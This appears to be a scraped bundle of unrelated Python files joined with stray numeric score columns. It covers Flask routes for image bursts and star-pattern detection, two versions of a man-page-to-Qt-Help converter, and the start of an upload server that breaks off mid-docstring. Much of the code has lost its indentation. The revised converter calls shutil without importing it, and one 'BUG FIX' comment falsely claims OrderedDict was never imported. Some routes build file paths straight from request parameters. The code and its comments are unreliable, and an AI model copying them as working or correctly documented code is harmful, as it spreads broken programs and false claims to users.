with zipfile.ZipFile(memory_file, 'w') as zf:
for i in range(1, files+1):
image_name = "{}/{}_{}.tiff".format(images_path, burst_id, i)
image_data = cv2.imread(image_name)
if burst_format == "jpeg":
_, image_data = cv2.imencode(".jpeg", image_data)
image_bytes = image_data.tobytes()
data = zipfile.ZipInfo("{}_{}.{}".format(burst_id, i, burst_format))
data.date_time = time.localtime(time.time())[:6]
data.compress_type = zipfile.ZIP_DEFLATED
zf.writestr(data, image_bytes)
memory_file.seek(0)
attachment_name = "burst_{}_{}.zip".format(burst_id, burst_format)
return send_file(memory_file, attachment_filename=attachment_name,
as_attachment=True)
@app.route("/delete-burst")
def delete_burst():
"""Deletes the burst id given as parameter, this includes all the
images taken by that burst."""
images_path = "server/data/bursts"
burst_id = int(request.args.get('burstId'))
burst = DB.get_burst(burst_id)
files = int(burst['duration'] / burst['interval'])
for i in range(1, files+1):
try:
image_name = "{}/{}_{}.tiff".format(images_path, burst_id, i)
os.remove(image_name)
except Exception as e:
print(e)
DB.delete_burst(burst_id)
return "Done"
@app.route("/upload-image", methods=["POST"])
def upload_image():
"""Saves the image upload by the user and returns its base64 string
to show it in the DOM"""
images_path = f"{FILE_PATH}/data/images"
Path(images_path).mkdir(parents=True, exist_ok=True)
image = request.files['image']
image_ext = image.filename.rsplit(".", 1)[1]
uid = uuid.uuid1()
image.save(f"{images_path}/{uid}.{image_ext}")
saved_image = cv2.imread(f"{images_path}/{uid}.{image_ext}")
_, im_arr = cv2.imencode('.jpg', saved_image)
im_bytes = im_arr.tobytes()
img_b64 = base64.b64encode(im_bytes).decode("ascii")
return jsonify({
'b64_img': img_b64,
'uuid': f"{uid}.{image_ext}",
})
@app.route("/process-image")
def process_image():
"""Process the given image to find stars and returns
the image with the associated data"""
auto_threshold = request.args.get('auto_threshold')
label_guide_stars = request.args.get('label_guide_stars')
images_path = f"{FILE_PATH}/data/images"
response = {}
response['results'] = {}
uid = request.args.get('uuid')
image = cv2.imread(f"{images_path}/{uid}")
gray_img = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
blurred = cv2.GaussianBlur(gray_img, (3, 3), 0)
# Check if auto threshold was selected
logging.warning(auto_threshold)
if auto_threshold == "true":
threshold = ImageUtils.get_threshold(blurred, 170)
msg = {'type': 'info', 'msg': f'Automatic threshold selected: {threshold}'}
else:
threshold = int(request.args.get('threshold'))
msg = {'type': 'info', 'msg': f'Threshold selected by user input: {threshold}'}
response['results']['threshold'] = msg
# Get the threshold image
thresh_image = cv2.threshold(blurred, threshold, 255, cv2.THRESH_BINARY)[1]
# Convert to bytes and encode in base64 to send it in the response
_, im_arr = cv2.imencode('.jpg', thresh_image)
im_bytes = im_arr.tobytes()
img_b64 = base64.b64encode(im_bytes).decode("ascii")
response['b64_thresh_img'] = img_b64
# Get possible image stars
stars = ImageUtils.get_image_stars(thresh_image, gray_img)
# Find pattern if there are at least 4 possible images
pattern = []
if len(stars) >= 4:
pattern = catalog.find_stars_pattern(stars[0:4], err=0.010)
_, im_arr = cv2.imencode('.jpg', image)
im_bytes = im_arr.tobytes()
img_b64 = base64.b64encode(im_bytes).decode("ascii")
response['b64_img'] = img_b64
msg = {'type': 'info', 'msg': f'Possible stars found in the image: {len(stars)}'}
else:
msg = {'type': 'info', 'msg': f'Possible stars found in the image: {len(stars)}'}
response['results']['stars'] = msg
# Histogram
hist = cv2.calcHist([blurred], [0], None, [256], [0, 256])
response['hist'] = hist.tolist()
# If a pattern was found
if len(pattern) > 0:
response['pattern'] = True
# Get original image with pattern drawn
ImageUtils.draw_pattern(image, pattern[0])
# If draw extra guide Stars
if label_guide_stars == "true":
labeled = ImageUtils.draw_guide_stars(image, stars, pattern[0], max=10)
msg = {'type': 'info', 'msg': f'Extra guide stars labeled: {labeled}'}
response['results']['labeled'] = msg
_, im_arr = cv2.imencode('.jpg', image)
im_bytes = im_arr.tobytes()
img_b64 = base64.b64encode(im_bytes).decode("ascii")
response['pattern_points'] = img_b64
msg = {'type': 'success', 'msg': f'Pattern found: {pattern[1]}'}
else:
msg = {'type': 'Error', 'msg': f'Pattern not found'}
response['results']['pattern'] = msg
return jsonify(response) | 0.589835 | 0.217275 |
# Copyright (c) 2018 <NAME>
import argparse
from collections import OrderedDict
import glob
import os.path
import re
import subprocess
import sys
from html.parser import HTMLParser
from typing import Callable, List, NamedTuple, Optional, Tuple
__version__ = "0.2"
# Default Qt Help namespace used when --namespace is not given.
DEFAULT_NAMESPACE = "man.linux.org.1.0"
# %s is filled with the man section ("level"), e.g. 1, 3 or 3p.
IN_PATH = "/usr/share/man/man%s"
# Matches groff-generated cross references such as "<b>printf</b>(3)".
MAN_LINK = re.compile(r"<b>(\w+)</b>\((\d+p?)\)")
# Matches generated image files named "<keyword>-<n>.<ext>".
IMAGE_NAME_RE = re.compile(r"(?P<keyword>.+?)-\d+\.\w+")
# NOTE: the trailing comma makes this a (header, footer) TUPLE of strings.
QHP_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<QtHelpProject version="1.0">
<namespace>{namespace}</namespace>
<virtualFolder>man-pages</virtualFolder>
<customFilter name="Linux Man 1.0">
<filterAttribute>man</filterAttribute>
</customFilter>
""", """</QtHelpProject>
"""
# A (header, keywords->files separator, footer) triple for one man section.
CATEGORY_TEMPLATE = """<filterSection>
<filterAttribute>man</filterAttribute>
<filterAttribute>{filter_category}</filterAttribute>
<keywords>
""", """\
</keywords>
<files>
""", """\
</files>
</filterSection>
"""
class BasePath(object):
    """Helper that joins paths relative to a fixed base directory."""

    def __init__(self, path: str):
        # Base directory all later joins are resolved against.
        self._path = path

    def join(self, *paths: str) -> str:
        """Return *paths* appended to the base path via os.path.join."""
        parts = (self._path,) + paths
        return os.path.join(*parts)
# Run-time configuration threaded through the conversion functions.
Options = NamedTuple("Options", [
    ("cache_path", BasePath),        # root directory for generated output
    ("qhp", str),                    # project file name (basename only)
    ("force", bool),                 # re-write files even when unchanged
    ("sources", List[str]),          # man sections ("levels") to convert
    ("qhp_namespace", str),          # Qt Help namespace for the project
    ("quiet", bool),
    ("print", Callable)              # progress printer (no-op when quiet)
])
# Result of converting one man section: keywords found, cross references
# seen in the generated HTML, and whether any groff run failed.
LevelResult = NamedTuple("LevelResult", [
    ("keywords", List["Keyword"]),
    ("cross_references", List[Tuple[str, str]]),
    ("has_errors", bool),
])
def man_path(level: int, page: Optional[str]=None) -> str:
    """Return the directory of a man section or, when *page* is given,
    that page's path inside the section directory."""
    section_dir = IN_PATH % level
    if page is None:
        return section_dir
    return os.path.join(section_dir, page)
def src_bzip(path: str) -> str:
    """Decompress *path* with the external ``bunzip2`` tool and return the
    output decoded as UTF-8 (undecodable bytes are replaced)."""
    return subprocess.check_output(["bunzip2", "-c", path]).decode("utf-8", errors="replace")
def src_raw(path: str) -> str:
    """Read *path* as UTF-8 text, replacing undecodable bytes.

    Consistency fix: decodes exactly like ``src_bzip`` instead of relying on
    the locale's preferred encoding, which could raise UnicodeDecodeError on
    non-ASCII pages under a C locale.
    """
    with open(path, "r", encoding="utf-8", errors="replace") as f:
        return f.read()
def remove_extensions(source: str, *extensions: str) -> str:
    """Repeatedly strip a trailing extension while it is one of *extensions*."""
    name = source
    while True:
        base, ext = os.path.splitext(name)
        if ext not in extensions:
            return name
        name = base
def result_name(source_name: str, level: str) -> str:
    """Map a man-page source filename to its HTML output name
    (strips .bz2 and the section suffix, then appends .html)."""
    base = os.path.basename(source_name)
    return remove_extensions(base, ".bz2", "." + level) + ".html"
def src(path: str) -> Optional[Tuple[Optional[str], str, Optional[str]]]:
    """Load a man-page source file.

    Returns ``(data, name, alias_source)``:
    * ``(text, name, None)`` for a regular page,
    * ``(None, name, path)`` for a ``.so`` alias, with ``path`` the resolved
      alias source file,
    * ``None`` when the file is missing, the alias cannot be resolved, or a
      multi-line ``.so`` file is seen (that case falls through and returns
      None implicitly).
    """
    if not os.path.exists(path):
        print("Does not exist:", path)
        return None
    base = os.path.basename(path)
    if path.endswith(".bz2"):
        data = src_bzip(path)
        name = os.path.splitext(base)[0]
    else:
        data = src_raw(path)
        name = base
    # Second splitext drops the section suffix (e.g. "ls.1" -> "ls").
    name = os.path.splitext(name)[0]
    if data.startswith(".so "):
        alias = data.strip().split("\n")
        if len(alias) == 1:
            alias = alias[0]
            # Form 1: ".so [path/]manN/page"
            alias_info = re.match(r"\.so\s+(?:.*?/)?man(\d+)/([\w_-]+)", alias)
            if alias_info is not None:
                alias_path = man_path(int(alias_info.group(1)), alias_info.group(2))
            else:
                # Form 2: ".so page.N" (section taken from the extension)
                alias_info = re.match(r"\.so\s+([\w_-]+\.(\d))", alias)
                if alias_info is not None:
                    alias_path = man_path(int(alias_info.group(2)), alias_info.group(1))
                else:
                    print("not understood alias:", name, data)
                    return None
            # The alias target may be stored compressed; glob for any extension.
            candidates = glob.glob(alias_path + ".*")
            if len(candidates) == 0:
                print("No matching alias source:", alias_path)
                return None
            elif len(candidates) > 1:
                print("Too many candidates:", name, "/", alias)
                print("\n".join(candidates))
                return None
            else:
                return None, name, candidates[0]
    else:
        return data, name, None
class TitleFinder(HTMLParser):
    """Collect the text of the first <title> element fed to the parser."""

    def __init__(self):
        super(TitleFinder, self).__init__()
        self._capturing = False
        self._text = ""

    @property
    def title(self):
        """Text gathered from the first <title> element (may be empty)."""
        return self._text

    def error(self, message):
        # HTMLParser's error hook; report and keep going.
        print(message)

    def handle_starttag(self, tag, attrs):
        if tag == "title" and not self._capturing:
            if self._text:
                # A title was already captured; ignore further ones.
                print("Multiple title-elements")
            else:
                self._capturing = True
        super().handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag == "title" and self._capturing:
            self._capturing = False
        super().handle_endtag(tag)

    def handle_data(self, data):
        if self._capturing:
            self._text += data
        super().handle_data(data)
def title_tag(text: str) -> str:
    """Wrap *text* in an HTML <title> element."""
    return "<title>{}</title>".format(text)
class Keyword(object):
    """A help keyword paired with the output file it resolves to."""

    def __init__(self, keyword: str, target: str, is_alias: bool = False):
        # Keyword, such as `select`.
        self.keyword = keyword
        # Output or target filename.
        self.target = target
        # If True, `target` points to the alias target.
        self.is_alias = is_alias
def link_replacer(ref_list: List[Tuple[str, str]]):
    """Build a ``re.sub`` callback that wraps man-page cross references in
    links and records every ``(section, page)`` pair into *ref_list*."""
    def fn(match) -> str:
        page = match.group(1)
        section = match.group(2)
        ref_list.append((section, page))
        href = "../html." + section + "/" + page + ".html"
        return '<a href="' + href + '">' + match.group(0) + '</a>'
    return fn
def do_level(level: str, options: Options) -> LevelResult:
    """Convert every man page of one section to HTML.

    Pages are rendered with groff into ``<cache>/html.<level>/`` (images in
    an ``images/`` subdirectory).  Stale HTML files and images belonging to
    removed pages are deleted afterwards.  Returns the keywords produced,
    the cross references seen in the generated HTML, and whether any groff
    invocation failed.
    """
    level_keywords = []  # type: List[Keyword]
    cross_references = []  # type: List[Tuple[str, str]]
    has_errors = False
    out_dir = options.cache_path.join("html.%s" % level)
    if not os.path.exists(out_dir):
        os.mkdir(out_dir)
    images_dir = os.path.join(out_dir, "images")
    if not os.path.exists(images_dir):
        os.mkdir(images_dir)
    in_dir = IN_PATH % level
    # Needed for images to work correctly with relative path.
    original_dir = os.getcwd()
    os.chdir(out_dir)
    for f in os.listdir(in_dir):
        source_filename = os.path.join(in_dir, f)
        source_mtime = os.path.getmtime(source_filename)
        src_result = src(source_filename)
        if src_result is None:
            continue
        man_data, name, alias = src_result
        # man_data is None for `.so` alias pages: record the keyword pointing
        # at the alias target's output file, no rendering needed.
        if man_data is None:
            base_name = result_name(alias, level)
            target = options.cache_path.join("html.%s" % level, base_name)
            options.print("alias", name, "=", target)
            level_keywords.append(Keyword(name, target, is_alias=True))
            continue
        base_name = result_name(name, level)
        target = options.cache_path.join("html.%s" % level, base_name)
        out_file = base_name
        level_keywords.append(Keyword(name, target))
        # Skip unchanged pages: the output mtime is pinned to the source mtime
        # below, so a near-equal mtime means "already converted".
        if not options.force and os.path.exists(out_file) and abs(os.path.getmtime(out_file) - source_mtime) < 1.0:
            options.print("keyword", name, "=", out_file, " # UNCHANGED delta %ss" %
                          str(os.path.getmtime(out_file) - source_mtime))
            continue
        options.print("keyword", name, "=", target)
        # Define path and name for images.
        image_args = [
            "-P", "-D" + "images",
            "-P", "-I" + name + "-",
        ]
        process = subprocess.run("groff -t -m mandoc -mwww -Thtml".split() + image_args,
                                 input=man_data, stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8")
        html_data = process.stdout
        error_text = process.stderr
        if error_text:
            print("entry %s:" % name, error_text, file=sys.stderr)
        if process.returncode != 0:
            print("error running groff: %d. output not written" % process.returncode)
            has_errors = True
            continue
        parser = TitleFinder()
        parser.feed(html_data)
        # Replace all caps title to something more informative.
        html_data = html_data.replace(title_tag(parser.title), title_tag(parser.title.lower() + " | man" + str(level)))
        # Replace all cross-references to other man-pages with links to them, regardless whether they exist or not.
        html_data = MAN_LINK.sub(link_replacer(cross_references), html_data)
        with open(out_file, "w") as o:
            o.write(html_data)
        # Set result file modification time to source time to allow checking changes in future.
        os.utime(out_file, (source_mtime, source_mtime))
    # Restore working directory.
    os.chdir(original_dir)
    # Delete generated files whose source page no longer exists.
    level_files = set(os.path.basename(kw.target) for kw in level_keywords if not kw.is_alias)
    for file in os.listdir(out_dir):
        # NOTE(review): `file` is a bare name from listdir(out_dir) but
        # isfile() resolves it against the restored CWD — likely should be
        # os.path.isfile(os.path.join(out_dir, file)); confirm intent.
        if os.path.isfile(file) and file not in level_files:
            to_remove = os.path.join(out_dir, file)
            options.print("delete", to_remove)
            os.remove(to_remove)
    # Delete images whose owning keyword is gone (image names start with it).
    keywords = set(kw.keyword for kw in level_keywords if not kw.is_alias)
    for file in os.listdir(images_dir):
        match = IMAGE_NAME_RE.match(file)
        if match is not None:
            kw = match.group(1)
            if kw in keywords:
                continue
            to_remove = os.path.join(images_dir, file)
            options.print("delete", to_remove)
            os.remove(to_remove)
    return LevelResult(level_keywords, cross_references, has_errors)
def do_levels(options: Options):
    """Convert all requested man sections and write the .qhp project file.

    Runs :func:`do_level` for every section in ``options.sources``, then
    emits one ``<filterSection>`` per section into the project file inside
    the cache directory.
    """
    kws = OrderedDict()
    cross_references = []
    has_errors = False
    for level in options.sources:
        options.print("category", level)
        lkw, cross, errors = do_level(level, options)
        options.print("end category", level)
        kws[level] = lkw
        # NOTE(review): cross references are collected here but never used
        # below — presumably reserved for future link validation; confirm.
        cross_references.extend(cross)
        has_errors |= errors
    # Qt Help requires that the files included and the project file are in same directory.
    catalog = options.cache_path.join(options.qhp)
    with open(catalog, "w") as o:
        o.write(QHP_TEMPLATE[0].format(namespace=options.qhp_namespace))
        for level, keywords in kws.items():
            o.write(CATEGORY_TEMPLATE[0].format(filter_category="man" + str(level)))
            for kw in keywords:
                o.write(' <keyword name="{}" ref="{}" />\n'.format(kw.keyword, kw.target))
            o.write(CATEGORY_TEMPLATE[1])
            # Globs are expanded by qhelpgenerator itself.
            o.write(" <file>html." + level + "/*.html</file>\n")
            o.write(" <file>html." + level + "/images/*</file>\n")
            o.write(CATEGORY_TEMPLATE[2])
        o.write(QHP_TEMPLATE[1])
    print("Wrote catalog to", catalog)
    if has_errors:
        print("Processing had errors and some files were skipped.")
    else:
        print("To actually create the help file, use qhelpgenerator", catalog)
def check_system() -> bool:
    """Report whether the external tools needed for conversion are installed.

    Every tool is probed (no short-circuiting) so the user sees all missing
    pieces at once; returns True only when everything was found.
    """
    def which(name: str, message: str) -> bool:
        try:
            subprocess.check_output(["which", name], stderr=subprocess.STDOUT)
            return True
        except subprocess.CalledProcessError:
            print("Missing", message)
            return False

    checks = [
        which("groff", "main part, groff, the document formatting system"),
        which("pnmtopng", "netpbm (or pnmtopng)"),
        which("psselect", "psutils (or psselect)"),
    ]
    return all(checks)
def make_argument_parser():
    """Build the command-line parser for the man-page converter."""
    parser = argparse.ArgumentParser(
        description="man-page to Qt Help converter."
    )
    parser.add_argument("levels", nargs="+", metavar="LEVEL",
                        help="man-page level to add for conversion, such as 2")
    parser.add_argument("--cache-dir", type=str, metavar="DIR", default=".",
                        help="Use given cache root directory instead of current directory.")
    parser.add_argument("-f", "--force", action="store_true", default=False,
                        help="Re-write all files.")
    parser.add_argument("-o", "--output", type=str, default="man.qhp",
                        help="Write to given file instead of man.qhp."
                             " Note, the file will be forced into the cache directory!")
    parser.add_argument("--ignore-system-check", action="store_true", default=False,
                        help="Ignore system check results and process anyways.")
    parser.add_argument("-q", "--quiet", action="store_true", default=False,
                        help="Make less noise.")
    qhp = parser.add_argument_group("Qt Help Project options")
    qhp.add_argument("--namespace", default=DEFAULT_NAMESPACE,
                     help="Namespace to use instead of %s" % DEFAULT_NAMESPACE)
    parser.add_argument("--version", action="version", version="%(prog)s " + __version__)
    return parser
def main(*argv):
    """Entry point: parse arguments, verify tools, run the conversion.

    *argv* overrides the real command line (useful for testing); with no
    arguments, sys.argv is parsed.
    """
    parser = make_argument_parser()
    args = parser.parse_args(args=argv if argv else None)
    # Refuse to run with missing tools unless the user overrides the check.
    if not check_system() and not args.ignore_system_check:
        sys.exit(1)

    def q_print(*p_args, **p_kwargs):
        # Progress printer honoring --quiet.
        if not args.quiet:
            print(*p_args, **p_kwargs)

    options = Options(
        cache_path=BasePath(args.cache_dir),
        qhp=os.path.basename(args.output),
        force=args.force,
        sources=args.levels,
        qhp_namespace=args.namespace,
        quiet=args.quiet,
        print=q_print,
    )
    do_levels(options)


if __name__ == "__main__":
    main()
# Copyright (c) 2018 <NAME>
import argparse
from collections import OrderedDict
import glob
import os.path
import re
import subprocess
import sys
from html.parser import HTMLParser
from typing import Callable, List, NamedTuple, Optional, Tuple
__version__ = "0.2"
DEFAULT_NAMESPACE = "man.linux.org.1.0"
IN_PATH = "/usr/share/man/man%s"
MAN_LINK = re.compile(r"<b>(\w+)</b>\((\d+p?)\)")
IMAGE_NAME_RE = re.compile(r"(?P<keyword>.+?)-\d+\.\w+")
QHP_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<QtHelpProject version="1.0">
<namespace>{namespace}</namespace>
<virtualFolder>man-pages</virtualFolder>
<customFilter name="Linux Man 1.0">
<filterAttribute>man</filterAttribute>
</customFilter>
""", """</QtHelpProject>
"""
CATEGORY_TEMPLATE = """<filterSection>
<filterAttribute>man</filterAttribute>
<filterAttribute>{filter_category}</filterAttribute>
<keywords>
""", """\
</keywords>
<files>
""", """\
</files>
</filterSection>
"""
class BasePath(object):
def __init__(self, path: str):
self._path = path
def join(self, *paths: str) -> str:
return os.path.join(self._path, *paths)
Options = NamedTuple("Options", [
("cache_path", BasePath),
("qhp", str),
("force", bool),
("sources", List[str]),
("qhp_namespace", str),
("quiet", bool),
("print", Callable)
])
LevelResult = NamedTuple("LevelResult", [
("keywords", List["Keyword"]),
("cross_references", List[Tuple[str, str]]),
("has_errors", bool),
])
def man_path(level: int, page: Optional[str]=None) -> str:
if page is None:
return IN_PATH % level
return os.path.join(IN_PATH % level, page)
def src_bzip(path: str) -> str:
return subprocess.check_output(["bunzip2", "-c", path]).decode("utf-8", errors="replace")
def src_raw(path: str) -> str:
with open(path, "r") as f:
return f.read()
def remove_extensions(source: str, *extensions: str) -> str:
base, ext = os.path.splitext(source)
if ext in extensions:
return remove_extensions(base, *extensions)
return source
def result_name(source_name: str, level: str) -> str:
stripped = remove_extensions(os.path.basename(source_name), ".bz2", "." + level)
return stripped + ".html"
def src(path: str) -> Optional[Tuple[Optional[str], str, Optional[str]]]:
    """Load a man source file.

    Returns one of:
      * ``(data, name, None)``       -- a regular page with its roff source,
      * ``(None, name, alias_path)`` -- a ``.so`` alias pointing at another page,
      * ``None``                     -- missing file or an alias that could not
                                        be resolved.
    """
    if not os.path.exists(path):
        print("Does not exist:", path)
        return None
    base = os.path.basename(path)
    if path.endswith(".bz2"):
        data = src_bzip(path)
        name = os.path.splitext(base)[0]
    else:
        data = src_raw(path)
        name = base
    name = os.path.splitext(name)[0]
    if data.startswith(".so "):
        # A .so page is just a redirect; the first line carries the target.
        # BUG FIX: the old code only unwrapped the split() list when it had
        # exactly one element, so a file with trailing lines passed a list
        # to re.match and crashed with TypeError.
        alias = data.strip().split("\n")[0]
        alias_info = re.match(r"\.so\s+(?:.*?/)?man(\d+)/([\w_-]+)", alias)
        if alias_info is not None:
            alias_path = man_path(int(alias_info.group(1)), alias_info.group(2))
        else:
            # Fallback form: ".so page.N" without a directory component.
            alias_info = re.match(r"\.so\s+([\w_-]+\.(\d))", alias)
            if alias_info is not None:
                alias_path = man_path(int(alias_info.group(2)), alias_info.group(1))
            else:
                print("not understood alias:", name, data)
                return None
        candidates = glob.glob(alias_path + ".*")
        if len(candidates) == 0:
            print("No matching alias source:", alias_path)
            return None
        elif len(candidates) > 1:
            print("Too many candidates:", name, "/", alias)
            print("\n".join(candidates))
            return None
        else:
            return None, name, candidates[0]
    else:
        return data, name, None
class TitleFinder(HTMLParser):
    """HTML parser that captures the text of the first <title> element."""

    def __init__(self):
        super().__init__()
        self._in_title = False
        self._title = ""

    @property
    def title(self):
        """Accumulated text of the first <title> element seen."""
        return self._title

    def error(self, message):
        print(message)

    def handle_starttag(self, tag, attrs):
        if tag == "title" and not self._in_title:
            if self._title:
                # A title was already captured; ignore later ones.
                print("Multiple title-elements")
            else:
                self._in_title = True
        super().handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag == "title" and self._in_title:
            self._in_title = False
        super().handle_endtag(tag)

    def handle_data(self, data):
        if self._in_title:
            self._title += data
        super().handle_data(data)
def title_tag(text: str) -> str:
    """Wrap *text* in an HTML <title> element."""
    return f"<title>{text}</title>"
class Keyword(object):
    """One help-index entry mapping a man keyword to its generated HTML file."""

    def __init__(self, keyword: str, target: str, is_alias: bool = False):
        # Keyword, such as `select`.
        self.keyword = keyword
        # Output or target filename.
        self.target = target
        # If True, `target` points to the alias target's output file.
        self.is_alias = is_alias
def link_replacer(ref_list: List[Tuple[str, str]]):
    """Build a regex-substitution callback that hyperlinks man cross-references.

    Every reference encountered is also appended to *ref_list* as a
    (section, page) pair.
    """
    def fn(match) -> str:
        page, section = match.group(1), match.group(2)
        ref_list.append((section, page))
        return '<a href="../html.{0}/{1}.html">{2}</a>'.format(section, page, match.group(0))
    return fn
def do_level(level: str, options: Options) -> LevelResult:
    """Convert every man page of one section to HTML.

    Renders each source page with groff, rewrites cross-references into
    hyperlinks, and prunes output files and images whose source page has
    disappeared.  Returns the keywords found, the cross-references seen,
    and whether any page failed to render.
    """
    level_keywords = []  # type: List[Keyword]
    cross_references = []  # type: List[Tuple[str, str]]
    has_errors = False
    out_dir = options.cache_path.join("html.%s" % level)
    if not os.path.exists(out_dir):
        os.mkdir(out_dir)
    images_dir = os.path.join(out_dir, "images")
    if not os.path.exists(images_dir):
        os.mkdir(images_dir)
    in_dir = IN_PATH % level
    # Needed for images to work correctly with relative path.
    original_dir = os.getcwd()
    os.chdir(out_dir)
    for f in os.listdir(in_dir):
        source_filename = os.path.join(in_dir, f)
        source_mtime = os.path.getmtime(source_filename)
        src_result = src(source_filename)
        if src_result is None:
            continue
        man_data, name, alias = src_result
        if man_data is None:
            # `.so` alias page: index it under the alias target's output file.
            base_name = result_name(alias, level)
            target = options.cache_path.join("html.%s" % level, base_name)
            options.print("alias", name, "=", target)
            level_keywords.append(Keyword(name, target, is_alias=True))
            continue
        base_name = result_name(name, level)
        target = options.cache_path.join("html.%s" % level, base_name)
        out_file = base_name
        level_keywords.append(Keyword(name, target))
        # Skip regeneration when the output's mtime still matches the source.
        if not options.force and os.path.exists(out_file) and abs(os.path.getmtime(out_file) - source_mtime) < 1.0:
            options.print("keyword", name, "=", out_file, " # UNCHANGED delta %ss" %
                          str(os.path.getmtime(out_file) - source_mtime))
            continue
        options.print("keyword", name, "=", target)
        # Define path and name for images.
        image_args = [
            "-P", "-D" + "images",
            "-P", "-I" + name + "-",
        ]
        process = subprocess.run("groff -t -m mandoc -mwww -Thtml".split() + image_args,
                                 input=man_data, stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8")
        html_data = process.stdout
        error_text = process.stderr
        if error_text:
            print("entry %s:" % name, error_text, file=sys.stderr)
        if process.returncode != 0:
            print("error running groff: %d. output not written" % process.returncode)
            has_errors = True
            continue
        parser = TitleFinder()
        parser.feed(html_data)
        # Replace all caps title to something more informative.
        html_data = html_data.replace(title_tag(parser.title), title_tag(parser.title.lower() + " | man" + str(level)))
        # Replace all cross-references to other man-pages with links to them, regardless whether they exist or not.
        html_data = MAN_LINK.sub(link_replacer(cross_references), html_data)
        with open(out_file, "w") as o:
            o.write(html_data)
        # Set result file modification time to source time to allow checking changes in future.
        os.utime(out_file, (source_mtime, source_mtime))
    # Restore working directory.
    os.chdir(original_dir)
    # Prune generated HTML whose source page no longer exists.
    level_files = set(os.path.basename(kw.target) for kw in level_keywords if not kw.is_alias)
    for file in os.listdir(out_dir):
        # BUG FIX: the old code tested os.path.isfile(file) after chdir-ing
        # back to original_dir, so the check ran against the wrong directory
        # and stale files were never removed; test the real path instead.
        if os.path.isfile(os.path.join(out_dir, file)) and file not in level_files:
            to_remove = os.path.join(out_dir, file)
            options.print("delete", to_remove)
            os.remove(to_remove)
    # Prune images belonging to pages that no longer exist.
    keywords = set(kw.keyword for kw in level_keywords if not kw.is_alias)
    for file in os.listdir(images_dir):
        match = IMAGE_NAME_RE.match(file)
        if match is not None:
            kw = match.group(1)
            if kw in keywords:
                continue
            to_remove = os.path.join(images_dir, file)
            options.print("delete", to_remove)
            os.remove(to_remove)
    return LevelResult(level_keywords, cross_references, has_errors)
def do_levels(options: Options):
    """Convert all requested man sections and write the Qt Help project file."""
    # BUG FIX: the original used OrderedDict without ever importing it, which
    # raised NameError at runtime; a plain dict preserves insertion order on
    # Python 3.7+, which is all that is needed here.
    kws = {}
    cross_references = []
    has_errors = False
    for level in options.sources:
        options.print("category", level)
        lkw, cross, errors = do_level(level, options)
        options.print("end category", level)
        kws[level] = lkw
        cross_references.extend(cross)
        has_errors |= errors
    # Qt Help requires that the files included and the project file are in same directory.
    catalog = options.cache_path.join(options.qhp)
    with open(catalog, "w") as o:
        o.write(QHP_TEMPLATE[0].format(namespace=options.qhp_namespace))
        for level, keywords in kws.items():
            o.write(CATEGORY_TEMPLATE[0].format(filter_category="man" + str(level)))
            for kw in keywords:
                o.write(' <keyword name="{}" ref="{}" />\n'.format(kw.keyword, kw.target))
            o.write(CATEGORY_TEMPLATE[1])
            o.write(" <file>html." + level + "/*.html</file>\n")
            o.write(" <file>html." + level + "/images/*</file>\n")
            o.write(CATEGORY_TEMPLATE[2])
        o.write(QHP_TEMPLATE[1])
    print("Wrote catalog to", catalog)
    if has_errors:
        print("Processing had errors and some files were skipped.")
    else:
        print("To actually create the help file, use qhelpgenerator", catalog)
def check_system() -> bool:
    """Check that the external tools the converter relies on are installed.

    Prints a message for every missing tool and returns True only when all
    of them are present.
    """
    def which(name: str, message: str) -> bool:
        # shutil.which resolves against PATH without spawning an external
        # `which` process, and works on platforms that have no such binary.
        if shutil.which(name) is None:
            print("Missing", message)
            return False
        return True

    e = which("groff", "main part, groff, the document formatting system")
    e &= which("pnmtopng", "netpbm (or pnmtopng)")
    e &= which("psselect", "psutils (or psselect)")
    return e
def make_argument_parser():
    """Build the command-line parser for the converter.

    Returns:
        argparse.ArgumentParser: parser accepting one or more LEVEL
        arguments plus cache, output, namespace and verbosity options.
        Requires a module-level ``import argparse``.
    """
    parser = argparse.ArgumentParser(
        description="man-page to Qt Help converter."
    )
    parser.add_argument("levels", nargs="+", metavar="LEVEL",
                        help="man-page level to add for conversion, such as 2")
    parser.add_argument("--cache-dir", type=str, metavar="DIR", default=".",
                        help="Use given cache root directory instead of current directory.")
    parser.add_argument("-f", "--force", action="store_true", default=False,
                        help="Re-write all files.")
    parser.add_argument("-o", "--output", type=str, default="man.qhp",
                        help="Write to given file instead of man.qhp."
                             " Note, the file will be forced into the cache directory!")
    parser.add_argument("--ignore-system-check", action="store_true", default=False,
                        help="Ignore system check results and process anyways.")
    parser.add_argument("-q", "--quiet", action="store_true", default=False,
                        help="Make less noise.")
    qhp = parser.add_argument_group("Qt Help Project options")
    qhp.add_argument("--namespace", default=DEFAULT_NAMESPACE,
                     help="Namespace to use instead of %s" % DEFAULT_NAMESPACE)
    parser.add_argument("--version", action="version", version="%(prog)s " + __version__)
    return parser
def main(*argv):
    """Entry point: parse arguments, verify required tools, run conversion.

    When called without arguments the process's own command line is parsed.
    """
    parser = make_argument_parser()
    args = parser.parse_args(args=list(argv) or None)
    if not check_system() and not args.ignore_system_check:
        sys.exit(1)

    def q_print(*p_args, **p_kwargs):
        # Progress printer that goes silent under --quiet.
        if not args.quiet:
            print(*p_args, **p_kwargs)

    do_levels(Options(
        cache_path=BasePath(args.cache_dir),
        qhp=os.path.basename(args.output),
        force=args.force,
        sources=args.levels,
        qhp_namespace=args.namespace,
        quiet=args.quiet,
        print=q_print,
    ))
if __name__ == "__main__":
main() | 0.589953 | 0.149128 |
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import cgi
import os
import shutil
def savefile(fname, messagecontent):
    """Persist an uploaded file's raw bytes into the files\\subs directory.

    Builds the destination path directly instead of chdir-ing in and out,
    so a failed write can no longer leave the process in the wrong working
    directory; the `with` block also makes the explicit close redundant.
    """
    # fname comes from an untrusted form field: keep only the final path
    # component so "../" sequences cannot escape the upload directory.
    safe_name = os.path.basename(fname)
    with open(os.path.join('files\\subs', safe_name), 'wb') as ufl:
        ufl.write(messagecontent)
    print("File saved!")
def escape(input):
    """Return *input* with HTML-special characters replaced by entities.

    BUG FIX: the replacement table mapped every character to itself (the
    entity strings had been lost), so nothing was actually escaped; this
